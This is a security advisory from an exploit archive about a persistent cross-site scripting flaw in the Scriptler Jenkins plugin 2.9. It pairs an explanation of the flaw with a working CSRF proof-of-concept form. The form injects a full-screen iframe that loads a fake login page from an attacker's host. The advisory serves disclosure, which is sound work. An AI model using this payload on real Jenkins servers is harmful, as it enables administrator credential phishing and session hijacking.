what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Scriptler Jenkins 2.9 Cross Site Scripting

Scriptler Jenkins 2.9 Cross Site Scripting
Posted Apr 15, 2017
Authored by Securify B.V., Burak Kelebek

Scriptler Jenkins version 2.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 484f0c9f4c2dce6057d71b5b1848deaed56ea83958b0a2b4f3e86290b3c68a16
Download | Favorite | View

Scriptler Jenkins 2.9 Cross Site Scripting

Change Mirror Download
------------------------------------------------------------------------
Persistent Cross-Site Scripting in Scriptler Jenkins Plugin
------------------------------------------------------------------------
Burak Kelebek, April 2017

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Scriptler Jenkins
plugin. This vulnerability allows an attacker to perform a wide variety
of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, an authenticated attacker has to inject arbitrary HTML in the
description of a Scriptler script and wait for an admin to visit the
script overview page. By combining this vulnerability with the reported
Cross-Site Request Forgery vulnerability it is possible for an
unauthenticated attacker to exploit this issue by luring an
authenticated administrator into visiting a specially crafted page.

------------------------------------------------------------------------
See also
------------------------------------------------------------------------
Jenkins Security Advisory 2017-04-10

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Scriptler version 2.9.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
There is currently no fix available

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20170406/persistent_cross_site_scripting_in_scriptler_jenkins_plugin.html

The Scriptler Jenkins plugin allows users to store/edit Groovy scripts and execute them on any of the slaves/nodes. Besides administering scripts, Scriptler also provides a way to share scripts between users via hosted script catalogs on the internet.

A persistent Cross-Site Scripting vulnerability exists in Scriptler. Administrators are able to submit arbitrary HTML as description of Scriptler scripts that are shown verbatim to other administrators. It is possible to add malicious code in the name field of the scriptAdd function of Scriptler. The malicious code is presented, as part of a newly added Scriptler script, on the overview page of Scriptler. The overview page does not properly HTML encode the value of the name field, allowing for Cross-Site Scripting attacks. This issue can also be exploited using Cross-Site Request Forgery, making it possible for an unauthenticated attacker to inject arbitrary HTML/scripting code by luring an authenticated administrator into visiting a specially crafted page.
Proof of concept

An authenticated user of Jenkins with rights to manage the Scriptler scripts or an anonymous attacker that exploits Cross-Site Request Forgery can inject HTML code within the name field while adding a new script in Scriptler. The proof of concept below will inject an iframe pointing to a fake login page that will be rendered over the overview page.

<html>
   <body>
      <form action="http://192.168.50.90:49001/scriptler/scriptAdd">
         <input type="hidden" name="id" value="asd" />
         <input type="hidden" name="name"
         value="<iframe src="http://192.168.1.132:1337/foo.html" style="display:block;background:#FFFFFF;border:none;height:100vh;width:100vw; z-index:999999;position:fixed; top:0px; left:0px; bottom:0px; right:0px;"></iframe>" />
         <input type="hidden" name="comment" value="asd" />
         <input type="hidden" name="script" value="as" />
         <input type="hidden" name="json" value="{"id": "asd", "name": "asd", "comment": "asd", "nonAdministerUsing": false, "onlyMaster": false, "script": "asd", "": "asd"}" />
         <input type="submit" name="Submit" value="Submit" />
      </form>
   </body>
</html>

When the attack is successful, the fake login page will be presented to any administrator visiting the Scriptler overview page.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close